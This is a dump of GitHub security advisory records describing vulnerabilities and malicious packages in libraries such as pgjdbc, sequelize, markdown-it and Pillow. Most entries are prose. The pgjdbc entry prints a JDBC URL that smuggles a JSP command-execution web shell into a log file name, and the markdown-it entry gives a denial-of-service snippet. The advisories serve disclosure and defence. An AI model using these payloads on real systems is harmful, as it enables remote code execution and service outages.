If the EOF marker is not detected as such however, this could lead to an infinite loop where JpegImagePlugin keeps trying to end the file. | null | 2022-03-11T23:39:41Z | 2022-03-11T23:39:27Z | LOW | 0 | {'CWE-400'} | {'https://github.com/advisories/GHSA-4fx9-vc88-q2xc', 'https://github.com/python-pillow/Pillow/commit/baae9ec4b67c68e3adaf1208cf54e8de5e38a6fd', 'https://pillow.readthedocs.io/en/stable/releasenotes/9.0.0.html#ensure-jpegimageplugin-stops-at-the-end-of-a-truncated-file'} | null |
GHSA | GHSA-23gj-368h-92pq | Path Traversal in DKPro Core | core/api/datasets/internal/actions/Explode.java in the Dataset API in DKPro Core through 1.10.0 allows Directory Traversal, resulting in the overwrite of local files with the contents of an archive. | {'CVE-2019-11082'} | 2021-08-04T15:17:12Z | 2019-05-29T18:05:11Z | HIGH | 7.5 | {'CWE-22'} | {'https://github.com/advisories/GHSA-23gj-368h-92pq', 'https://github.com/dkpro/dkpro-core/issues/1325', 'https://nvd.nist.gov/vuln/detail/CVE-2019-11082'} | null |
GHSA | GHSA-cff7-6h4q-q5pj | Lacked element count during splitting of JWE string | The json-jwt gem before 1.11.0 for Ruby lacks an element count during the splitting of a JWE string. | {'CVE-2019-18848'} | 2022-05-04T01:52:59Z | 2019-11-14T15:25:51Z | HIGH | 7.5 | {'CWE-287', 'CWE-20'} | {'https://nvd.nist.gov/vuln/detail/CVE-2019-18848', 'https://github.com/nov/json-jwt/commit/ada16e772906efdd035e3df49cb2ae372f0f948a', 'https://github.com/nov/json-jwt/compare/v1.10.2...v1.11.0', 'https://github.com/advisories/GHSA-cff7-6h4q-q5pj', 'https://lists.debian.org/debian-lts-announce/2020/10/msg00001.html'} | null |
GHSA | GHSA-35g4-qx3c-vjhx | Automatic room upgrade handling can be used maliciously to bridge a room non-consentually | ### Impact
If a bridge has room upgrade handling turned on in the configuration (the `roomUpgradeOpts` key when instantiating a new `Bridge` instance.), any `m.room.tombstone` event it encounters will be used to unbridge the current room and bridge into the target room. However, the target room `m.room.create` event is not checked to verify if the `predecessor` field contains the previous room. This means that any mailcious admin of a bridged room can repoint the traffic to a different room without the new room being aware.
### Patches
Versions 2.6.1 and greater are patched.
### Workarounds
Disabling the automatic room upgrade handling can be done by removing the `roomUpgradeOpts` key from the `Bridge` class options.
### References
The issue is patched by https://github.com/matrix-org/matrix-appservice-bridge/pull/330
### For more information]
If you have any questions or comments about this advisory, email us at security@matrix.org. | {'CVE-2021-32659'} | 2021-06-21T17:09:22Z | 2021-06-21T17:09:22Z | MODERATE | 6.5 | {'CWE-306'} | {'https://nvd.nist.gov/vuln/detail/CVE-2021-32659', 'https://github.com/advisories/GHSA-35g4-qx3c-vjhx', 'https://github.com/matrix-org/matrix-appservice-bridge/releases/tag/2.6.1', 'https://github.com/matrix-org/matrix-appservice-bridge/pull/330', 'https://github.com/matrix-org/matrix-appservice-bridge/security/advisories/GHSA-35g4-qx3c-vjhx', 'https://github.com/matrix-org/matrix-appservice-bridge/commit/b69e745584a34fcfd858df33e4631e420da07b9f'} | null |
GHSA | GHSA-6vfc-qv3f-vr6c | Uncontrolled Resource Consumption in markdown-it | ### Impact
Special patterns with length > 50K chars can slow down parser significantly.
```js
const md = require('markdown-it')();
md.render(`x ${' '.repeat(150000)} x \nx`);
```
### Patches
Upgrade to v12.3.2+
### Workarounds
No.
### References
Fix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101
| {'CVE-2022-21670'} | 2022-04-19T19:03:19Z | 2022-01-12T22:20:22Z | MODERATE | 5.3 | {'CWE-400'} | {'https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21670', 'https://github.com/advisories/GHSA-6vfc-qv3f-vr6c', 'https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101'} | null |
GHSA | GHSA-j9xp-92vc-559j | SQL Injection in sequelize | Affected versions of `sequelize` are vulnerable to SQL Injection. The package fails to sanitize JSON path keys in the MariaDB and MySQL dialects, which may allow attackers to inject SQL statements and execute arbitrary SQL queries.
## Recommendation
If you are using `sequelize` 5.x, upgrade to version 5.8.11 or later.
If you are using `sequelize` 4.x, upgrade to version 4.44.3 or later.
If you are using `sequelize` 3.x, upgrade to version 3.35.1 or later. | {'CVE-2019-10748'} | 2021-08-18T22:09:34Z | 2019-11-06T17:11:10Z | CRITICAL | 9.8 | {'CWE-89'} | {'https://snyk.io/vuln/SNYK-JS-SEQUELIZE-450221', 'https://github.com/sequelize/sequelize/pull/11089,', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10748', 'https://www.npmjs.com/advisories/1018', 'https://github.com/advisories/GHSA-j9xp-92vc-559j', 'https://github.com/sequelize/sequelize/commit/a72a3f5,'} | null |
GHSA | GHSA-45cp-hpc9-8347 | Malicious Package in css_transform_support | Version 1.0.2 of `css_transform_support` contained malicious code. The code when executed in the browser would enumerate password, cvc, cardnumber fields from forms and send the extracted values to `https://js-metrics.com/minjs.php?pl=`
## Recommendation
If version 1.0.2 of this module is found installed you will want to replace it with a version before or after 1.0.2. In addition to replacing the installed module, you will also want to evaluate your application to determine whether or not user data was compromised. | null | 2020-09-01T19:52:35Z | 2020-09-01T19:52:35Z | CRITICAL | 0 | null | {'https://github.com/advisories/GHSA-45cp-hpc9-8347', 'https://www.npmjs.com/advisories/624'} | null |
GHSA | GHSA-7v5r-r995-q2x2 | SSRF in repository migration | Gogs is a self-hosted Git service. The malicious user is able to discover services in the internal network through repository migration functionality. All installations accepting public traffic are affected. Internal network CIDRs are prohibited to be used as repository migration targets. Users should upgrade to 0.12.5 or the latest 0.13.0+dev. Gogs should be ran in its own private network until users can update. | {'CVE-2022-0870'} | 2022-03-24T23:23:22Z | 2022-03-12T00:00:34Z | MODERATE | 5 | {'CWE-918'} | {'https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0870', 'https://github.com/advisories/GHSA-7v5r-r995-q2x2', 'https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531'} | null |
GHSA | GHSA-gp32-7h29-rpxm | Moderate severity vulnerability that affects com.puppycrawl.tools:checkstyle | Checkstyle prior to 8.18 loads external DTDs by default, which can potentially lead to denial of service attacks or the leaking of confidential information. | {'CVE-2019-9658'} | 2021-09-13T12:37:35Z | 2019-03-14T15:39:14Z | MODERATE | 5.3 | {'CWE-611'} | {'https://lists.debian.org/debian-lts-announce/2019/04/msg00029.html', 'https://checkstyle.org/releasenotes.html#Release_8.18', 'https://github.com/checkstyle/checkstyle/issues/6474', 'https://lists.apache.org/thread.html/994221405e940e148adcfd9cb24ffc6700bed70c7820c55a22559d26@%3Cnotifications.fluo.apache.org%3E', 'https://github.com/checkstyle/checkstyle/issues/6478', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2BMOPJ2XYE4LB2HM7OMSUBBIYEDUTLWE/', 'https://lists.apache.org/thread.html/fff26ee7b59360a0264fef4e8ed9454ef652db2c39f2892a9ea1c9cb@%3Cnotifications.fluo.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-9658', 'https://lists.apache.org/thread.html/7eea10e7be4c21060cb1e79f6524c6e6559ba833b1465cd2870a56b9@%3Cserver-dev.james.apache.org%3E', 'https://lists.apache.org/thread.html/a35a8ccb316d4c2340710f610cba8058e87d5376259b35ef3ed2bf89@%3Cnotifications.accumulo.apache.org%3E', 'https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679@%3Ccommits.nifi.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AEYBAHYAV37WHMOXZYM2ZWF46FHON6YC/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJPT54USMGWT3Y6XVXLDEHKRUY2EI4OE/', 'https://github.com/checkstyle/checkstyle/pull/6476', 'https://lists.apache.org/thread.html/6bf8bbbca826e883f09ba40bc0d319350e1d6d4cf4df7c9e399b2699@%3Ccommits.fluo.apache.org%3E', 'https://github.com/advisories/GHSA-gp32-7h29-rpxm'} | null |
GHSA | GHSA-g4hj-r7r3-9rwv | OS Command Injection in gulp-scss-lint | gulp-scss-lint through 1.0.0 allows execution of arbitrary commands. It is possible to inject arbitrary commands to the "exec" function located in "src/command.js" via the provided options. | {'CVE-2020-7601'} | 2021-07-28T20:50:14Z | 2021-05-07T16:15:37Z | CRITICAL | 9.8 | {'CWE-98'} | {'https://github.com/advisories/GHSA-g4hj-r7r3-9rwv', 'https://snyk.io/vuln/SNYK-JS-GULPSCSSLINT-560114', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7601'} | null |
GHSA | GHSA-49r3-3h96-rwj6 | Cross-Site Scripting in ids-enterprise | Versions of `ids-enterprise` prior to 4.18.2 are vulnerable to Cross-Site Scripting (XSS). The `soho-dropdown` component does not properly encode its output and may allow attackers to execute arbitrary JavaScript.
## Recommendation
Upgrade to version 4.18.2 or later | null | 2021-08-16T15:19:11Z | 2019-06-13T19:09:31Z | HIGH | 0 | {'CWE-79'} | {'https://github.com/advisories/GHSA-49r3-3h96-rwj6', 'https://github.com/infor-design/enterprise/commit/6bd74d8f38c268b22f31e8169316e065e0093362', 'https://www.npmjs.com/advisories/956', 'https://github.com/infor-design/enterprise-ng/issues/503'} | null |
GHSA | GHSA-2563-83p7-f34p | Malicious Package in requestt | All versions of `requestt` typosquatted a popular package of similar name and tracked users who had installed the incorrect package. The package uploaded information to a remote server including: name of the downloaded package, name of the intended package, the Node version and whether the process was running as sudo. There is no further compromise.
## Recommendation
Remove the package from your dependencies and always ensure package names are typed correctly upon installation. | null | 2021-10-01T14:04:11Z | 2020-09-02T20:24:41Z | CRITICAL | 9.8 | {'CWE-506'} | {'https://www.npmjs.com/advisories/856', 'https://github.com/advisories/GHSA-2563-83p7-f34p'} | null |
GHSA | GHSA-rh6x-qvg7-rrmj | High severity vulnerability that affects ansible | The create_script function in the lxc_container module in Ansible before 1.9.6-1 and 2.x before 2.0.2.0 allows local users to write to arbitrary files or gain privileges via a symlink attack on (1) /opt/.lxc-attach-script, (2) the archived container in the archive_path directory, or the (3) lxc-attach-script.log or (4) lxc-attach-script.err files in the temporary directory. | {'CVE-2016-3096'} | 2021-09-17T18:18:54Z | 2018-10-10T17:23:45Z | HIGH | 7.8 | {'CWE-59'} | {'https://nvd.nist.gov/vuln/detail/CVE-2016-3096', 'https://github.com/advisories/GHSA-rh6x-qvg7-rrmj'} | null |
GHSA | GHSA-959j-5g9v-3fpq | Low severity vulnerability that affects paratrooper-newrelic | The paratrooper-newrelic gem 1.0.1 for Ruby allows local users to obtain the X-Api-Key value by listing the curl process. | {'CVE-2014-1234'} | 2021-09-07T20:42:36Z | 2017-10-24T18:33:36Z | LOW | 0 | {'CWE-200'} | {'http://openwall.com/lists/oss-security/2014/01/08/2', 'https://github.com/advisories/GHSA-959j-5g9v-3fpq', 'https://nvd.nist.gov/vuln/detail/CVE-2014-1234', 'http://www.vapid.dhs.org/advisories/paratrooper-newrelic-api.html'} | null |
GHSA | GHSA-phwj-86vx-cfjc | Cross-site scripting in Apache Jena Fuseki | A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive). | {'CVE-2021-33192'} | 2021-08-13T15:21:35Z | 2021-08-13T15:21:35Z | MODERATE | 6.1 | {'CWE-79'} | {'https://github.com/advisories/GHSA-phwj-86vx-cfjc', 'https://nvd.nist.gov/vuln/detail/CVE-2021-33192', 'https://lists.apache.org/thread.html/r684d8943d755a96fe90f8cd8df196737b6bde3f2b74e15a9bd479975%40%3Cusers.jena.apache.org%3E'} | null |
GHSA | GHSA-p65h-233c-jxvm | Downloads Resources over HTTP in resourcehacker | Affected versions of `resourcehacker` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `resourcehacker`.
## Recommendation
No patch is currently available for this vulnerability.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees. | {'CVE-2016-10646'} | 2021-01-08T18:23:56Z | 2018-08-15T19:03:59Z | HIGH | 0 | {'CWE-311'} | {'https://github.com/advisories/GHSA-p65h-233c-jxvm', 'https://www.npmjs.com/advisories/254', 'https://nodesecurity.io/advisories/254', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10646', 'https://github.com/felicienfrancois/node-resourcehacker/blob/master/scripts/install.js#L4'} | null |
GHSA | GHSA-673j-qm5f-xpv8 | Arbitrary File Write Vulnerability | ### Overview
The connection properties for configuring a pgjdbc connection are not meant to be exposed to an unauthenticated attacker. While allowing an attacker to specify arbitrary connection properties could lead to a compromise of a system, that's a defect of an application that allows unauthenticated attackers that level of control.
It's not the job of the pgjdbc driver to decide whether a given log file location is acceptable. End user applications that use the pgjdbc driver must ensure that filenames are valid and restrict unauthenticated attackers from being able to supply arbitrary values. That's not specific to the pgjdbc driver either, it would be true for any library that can write to the application's local file system.
While we do not consider this a security issue with the driver, we have decided to remove the loggerFile and loggerLevel connection properties in the next release of the driver. Removal of those properties does not make exposing the JDBC URL or connection properties to an attacker safe and we continue to suggest that applications do not allow untrusted users to specify arbitrary connection properties. We are removing them to prevent misuse and their functionality can be delegated to java.util.logging.
If you identify an application that allows remote users to specify a complete JDBC URL or properties without validating it's contents, we encourage you to notify the application owner as that may be a security defect in that specific application.
### Impact
It is possible to specify an arbitrary filename in the loggerFileName connection parameter
"jdbc:postgresql://localhost:5432/test?user=test&password=test&loggerLevel=DEBUG&loggerFile=./blah.jsp&<%Runtime.getRuntime().exec(request.getParameter(\"i\"));%>"
This creates a valid JSP file which could lead to a Remote Code Execution
### Patches
Problem has been resolved in version 42.3.3
### Workarounds
sanitize the inputs to the driver
| null | 2022-02-16T00:32:02Z | 2022-02-16T00:08:18Z | MODERATE | 0 | null | {'https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8', 'https://github.com/advisories/GHSA-673j-qm5f-xpv8', 'https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064'} | null |
GHSA | GHSA-gcm9-cc3r-c6vj | Cross-site Scripting (XSS) in Eclipse Theia | In Eclipse Theia versions up to and including 1.2.0, the Markdown Preview (@theia/preview), can be exploited to execute arbitrary code. | {'CVE-2020-27224'} | 2021-04-13T15:18:09Z | 2021-04-13T15:18:09Z | CRITICAL | 9.6 | {'CWE-79'} | {'https://github.com/eclipse-theia/theia/issues/7954', 'https://omespino.com/write-up-google-bug-bounty-xss-to-cloud-shell-instance-takeover-rce-as-root-5000-usd/', 'https://github.com/advisories/GHSA-gcm9-cc3r-c6vj', 'https://nvd.nist.gov/vuln/detail/CVE-2020-27224', 'https://github.com/eclipse-theia/theia/pull/7971'} | null |
GHSA | GHSA-g7q5-pjjr-gqvp | Regular Expression Denial of Service in tough-cookie | Affected versions of `tough-cookie` are susceptible to a regular expression denial of service.
The amplification on this vulnerability is relatively low - it takes around 2 seconds for the engine to execute on a malicious input which is 50,000 characters in length.
If node was compiled using the `-DHTTP_MAX_HEADER_SIZE` however, the impact of the vulnerability can be significant, as the primary limitation for the vulnerability is the default max HTTP header length in node.
## Recommendation
Update to version 2.3.3 or later. | {'CVE-2017-15010'} | 2021-09-10T20:28:20Z | 2018-07-24T20:14:39Z | HIGH | 7.5 | {'CWE-400'} | {'https://access.redhat.com/errata/RHSA-2018:1264', 'https://www.npmjs.com/advisories/525', 'https://github.com/advisories/GHSA-g7q5-pjjr-gqvp', 'https://snyk.io/vuln/npm:tough-cookie:20170905', 'http://www.securityfocus.com/bid/101185', 'https://access.redhat.com/errata/RHSA-2018:1263', 'https://nodesecurity.io/advisories/525', 'https://access.redhat.com/errata/RHSA-2017:2913', 'https://access.redhat.com/errata/RHSA-2017:2912', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6VEBDTGNHVM677SLZDEHMWOP3ISMZSFT/', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15010', 'https://github.com/salesforce/tough-cookie/issues/92'} | null |
GHSA | GHSA-fw99-f933-rgh8 | Out-of-bounds Read and Out-of-bounds Write in OpenCV | An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 4.1.1.26). There is an out of bounds read/write in the function HaarEvaluator::OptFeature::calc in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service. | {'CVE-2019-14492'} | 2021-10-12T22:09:31Z | 2021-10-12T22:09:31Z | HIGH | 7.5 | {'CWE-787', 'CWE-125'} | {'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html', 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a', 'https://github.com/opencv/opencv/issues/15124', 'https://github.com/advisories/GHSA-fw99-f933-rgh8', 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c', 'https://nvd.nist.gov/vuln/detail/CVE-2019-14492'} | null |
GHSA | GHSA-5p28-63mc-cgr9 | Cross-Site Scripting bypass in html-purify | All versions of html-purify are vulnerable to cross-site scripting. The data attribute inside of object tags is not properly sanitized and allows javascript URIs leading to code execution.
No fix is currently available. Consider using an alternative package until a fix is made available. | null | 2020-12-04T20:04:37Z | 2020-12-04T20:04:37Z | HIGH | 0 | {'CWE-79'} | {'https://www.npmjs.com/advisories/1586', 'https://github.com/advisories/GHSA-5p28-63mc-cgr9'} | null |
GHSA | GHSA-jq7p-26h5-w78r | Out-of-bounds read in Apache Thrift | In Apache Thrift 0.9.3 to 0.12.0, a server implemented in Go using TJSONProtocol or TSimpleJSONProtocol may panic when feed with invalid input data. | {'CVE-2019-0210'} | 2021-07-27T22:20:55Z | 2021-05-18T15:32:04Z | HIGH | 7.5 | {'CWE-125'} | {'https://lists.apache.org/thread.html/r36581cc7047f007dd6aadbdd34e18545ec2c1eb7ccdae6dd47a877a9@%3Ccommits.pulsar.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2020:0811', 'https://github.com/apache/thrift/blob/master/CHANGES.md#0130', 'http://mail-archives.apache.org/mod_mbox/thrift-dev/201910.mbox/%3C277A46CA87494176B1BBCF5D72624A2A%40HAGGIS%3E', 'https://access.redhat.com/errata/RHSA-2020:0806', 'https://lists.apache.org/thread.html/rab740e5c70424ef79fd095a4b076e752109aeee41c4256c2e5e5e142@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2019-0210', 'https://lists.apache.org/thread.html/r2832722c31d78bef7526e2c701ba4b046736e4c851473194a247392f@%3Ccommits.pulsar.apache.org%3E', 'https://lists.apache.org/thread.html/r55609613abab203a1f2c1f3de050b63ae8f5c4a024df0d848d6915ff@%3Ccommits.pulsar.apache.org%3E', 'https://security.gentoo.org/glsa/202107-32', 'https://access.redhat.com/errata/RHSA-2020:0804', 'https://github.com/apache/thrift/commit/264a3f318ed3e9e51573f67f963c8509786bcec2', 'https://access.redhat.com/errata/RHSA-2020:0805', 'https://github.com/advisories/GHSA-jq7p-26h5-w78r'} | null |
GHSA | GHSA-vpw8-43wm-rxw5 | Double free in endian_trait | An issue was discovered in the endian_trait crate through 2021-01-04 for Rust. A double drop can occur when a user-provided Endian impl panics. | {'CVE-2021-29929'} | 2021-08-25T20:54:06Z | 2021-08-25T20:54:06Z | HIGH | 7.5 | {'CWE-415'} | {'https://gitlab.com/myrrlyn/endian_trait/-/issues/1', 'https://github.com/advisories/GHSA-vpw8-43wm-rxw5', 'https://nvd.nist.gov/vuln/detail/CVE-2021-29929', 'https://rustsec.org/advisories/RUSTSEC-2021-0039.html'} | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.